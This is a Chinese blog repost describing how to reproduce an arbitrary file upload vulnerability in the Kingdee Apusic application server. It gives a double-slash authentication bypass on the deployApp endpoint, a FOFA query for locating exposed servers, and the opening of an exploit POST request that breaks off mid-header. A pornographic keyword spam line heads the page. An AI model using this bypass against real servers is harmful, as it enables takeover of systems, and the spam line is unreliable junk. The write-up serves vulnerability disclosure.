国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

  1. Toy模板網(wǎng)首頁
  2. >Toy博客

金蝶Apusic應(yīng)用服務(wù)器 任意文件上傳漏洞復(fù)現(xiàn)

2年前作者:OidBoy_G分類:Toy博客閱讀(24)違法舉報(bào)

這篇具有很好參考價(jià)值的文章主要介紹了金蝶Apusic應(yīng)用服務(wù)器 任意文件上傳漏洞復(fù)現(xiàn)。希望對大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

0x01 產(chǎn)品簡介

? ?金蝶Apusic應(yīng)用服務(wù)器(Apusic Application Server,AAS)是一款標(biāo)準(zhǔn)、安全、高效、集成并具豐富功能的企業(yè)級(jí)應(yīng)用服務(wù)器軟件,全面支持JakartaEE8/9的技術(shù)規(guī)范,提供滿足該規(guī)范的Web容器、EJB容器以及WebService容器等,支持Websocket1.1、Servlet4.0、HTTP2.0等最新的技術(shù)規(guī)范,為企業(yè)級(jí)應(yīng)用的便捷開發(fā)、靈活部署、可靠運(yùn)行、高效管控以及快速集成等提供關(guān)鍵支撐。

0x02 漏洞概述

? ?金蝶Apusic應(yīng)用服務(wù)器?deployApp?接口存在任意文件上傳漏洞,攻擊者可通過雙斜杠繞過鑒權(quán)并上傳惡意壓縮包接管服務(wù)器權(quán)限。

0x03 復(fù)現(xiàn)環(huán)境

FOFA:app="Apusic應(yīng)用服務(wù)器"

apusic漏洞,漏洞復(fù)現(xiàn),安全,web安全

0x04 漏洞復(fù)現(xiàn)

?Exp文章來源地址http://www.zghlxwxcb.cn/news/detail-758586.html

POST /admin//protect/application/deployApp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryd9acIBdVuqKWDJbd
Accept-Encoding: gzip

------WebKitFormBoundaryd9acIBdVuqKWDJbd
Con

到了這里,關(guān)于金蝶Apusic應(yīng)用服務(wù)器 任意文件上傳漏洞復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 上傳本地文件到HDFS服務(wù)器

    在這篇文章中,我將詳細(xì)介紹如何將本地文件上傳到HDFS(分布式文件系統(tǒng))服務(wù)器。我們將使用Hadoop命令行工具來完成這個(gè)任務(wù)。 首先,確保你已經(jīng)安裝了Hadoop并且HDFS服務(wù)器正在運(yùn)行。接下來,我們將按照以下步驟進(jìn)行操作: 步驟 1: 檢查HDFS文件系統(tǒng) 在上傳文件之前,我們

    2024年02月04日
    瀏覽(27)

  • java上傳文件到指定服務(wù)器

    首先要知道服務(wù)器的用戶名和密碼。 注意:一般情況,如果不是強(qiáng)制要求,盡量不要將文件上傳到服務(wù)器 步驟: 1.導(dǎo)入依賴 !--圖片上傳到服務(wù)器需要的依賴-- ? ? ? ? dependency ? ? ? ? ? ? groupIdcom.jcraft/groupId ? ? ? ? ? ? artifactIdjsch/artifactId ? ? ? ? ? ? version0.1.54/version

    2024年01月21日
    瀏覽(19)
  • JAVA實(shí)現(xiàn)文件上傳到服務(wù)器

    JAVA實(shí)現(xiàn)文件上傳到服務(wù)器

    java如何實(shí)現(xiàn)大文件斷點(diǎn)續(xù)傳、秒傳,JAVA實(shí)現(xiàn)文件上傳到服務(wù)器,jsp實(shí)現(xiàn)文件上傳到服務(wù)器,SpringBoot實(shí)現(xiàn)文件上傳到服務(wù)器,SpringMVC實(shí)現(xiàn)文件上傳到服務(wù)器,SpringCloud實(shí)現(xiàn)文件上傳到服務(wù)器,webuploader實(shí)現(xiàn)文件上傳到服務(wù)器,百度webuploader實(shí)現(xiàn)文件上傳到服務(wù)器,JAVA如何將文件

    2024年04月27日
    瀏覽(26)
  • mac PyCharm 上傳文件到遠(yuǎn)程服務(wù)器+遠(yuǎn)程服務(wù)器下載到本地

    mac PyCharm 上傳文件到遠(yuǎn)程服務(wù)器+遠(yuǎn)程服務(wù)器下載到本地

    選擇SFTP name:test6 輸入ssh賬號(hào)和密碼。保存密碼和30s心跳。 Local path(本地mac機(jī)器):/Users/clevercode/PycharmProjects/test6 Root path(遠(yuǎn)程服務(wù)機(jī)器):/home/clevercode/test6 Root path(遠(yuǎn)程服務(wù)機(jī)器):/home/clevercode/test6 [2024/1/18, 10:56 AM] Upload file ‘/Users/clevercode/PycharmProjects/test6/f100.py’ t

    2024年01月19日
    瀏覽(31)

  • Unity如何上傳一個(gè)文件到服務(wù)器

    在游戲開發(fā)過程中,有時(shí)候需要上傳一些文件到遠(yuǎn)程服務(wù)器上,比如游戲資源文件、玩家數(shù)據(jù)等等。在Unity中,我們可以使用UnityWebRequest類來實(shí)現(xiàn)文件上傳功能。本文將詳細(xì)介紹Unity如何上傳一個(gè)文件到服務(wù)器,并給出Unity與服務(wù)器的核心代碼實(shí)現(xiàn)。 對啦!這里有個(gè)游戲開發(fā)交

    2023年04月18日
    瀏覽(23)
  • springmvc上傳多文件到指定服務(wù)器

    springmvc上傳多文件到指定服務(wù)器

    package com.store.liqiang.util; import java.text.SimpleDateFormat; import java.util.Date; import java.util.Random; import org.springframework.web.bind.annotation.RequestParam; import org.springframework.web.multipart.MultipartFile; import com.sun.jersey.api.client.Client; import com.sun.jersey.api.client.WebResource; public class FileUpload { @SuppressWarnin

    2024年04月15日
    瀏覽(31)
  • Spring MVC異步上傳、跨服務(wù)器上傳和文件下載

    Spring MVC異步上傳、跨服務(wù)器上傳和文件下載

    之前的上傳方案,在上傳成功后都會(huì)跳轉(zhuǎn)頁面。而在實(shí)際開發(fā)中,很多情況下上傳后不進(jìn)行跳轉(zhuǎn),而是進(jìn)行頁面的局部刷新,比如:上傳頭像成功后將頭像顯示在網(wǎng)頁中。這時(shí)候就需要使用異步文件上傳。 編寫JSP頁面,引入jQuery和jQuery表單上傳工具jquery.form.js【該js文件已經(jīng)

    2024年02月16日
    瀏覽(31)
  • windows本地上傳文件到服務(wù)器(scp)

    windows本地上傳文件到服務(wù)器(scp)

    1.ssh 用戶名@ip:遠(yuǎn)程登錄服務(wù)器。 2.scp 本地文件路徑 用戶名@ip:上傳路徑 :本地文件與服務(wù)器進(jìn)行傳遞。 3.本地文件夾上傳到服務(wù)器 4.查看當(dāng)前文件夾下所有文件的權(quán)限 5.修改文件夾權(quán)限(777是最高權(quán)限) 注意:scp命令只適用于本機(jī)終端(比如cmd / powershell),或者是各種編

    2024年02月12日
    瀏覽(29)

  • FTP服務(wù)器文件自動(dòng)上傳、下載(bat)

    tips: 可以參照標(biāo)題3上面的配置,自行調(diào)整本地路徑、FTP服務(wù)器路徑、賬號(hào)密碼等

    2024年02月15日
    瀏覽(33)
  • 純nginx制作文件上傳下載服務(wù)器

    純nginx制作文件上傳下載服務(wù)器

    webdav 是一組超文本傳輸協(xié)議的技術(shù)集合,有利于用戶鍵協(xié)同編輯和管理存儲(chǔ)在萬維網(wǎng)服務(wù)器文檔。同時(shí)來說就是,webdav可以讓用戶直接存儲(chǔ),下載,編輯文件,操作文件需要進(jìn)行用戶認(rèn)證 需要的環(huán)境 linux上需要下載git(用來拉取鏡像) nginx版本為:nginx-1.22.0.tar.gz 至此,需要

    2024年02月15日
    瀏覽(94)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包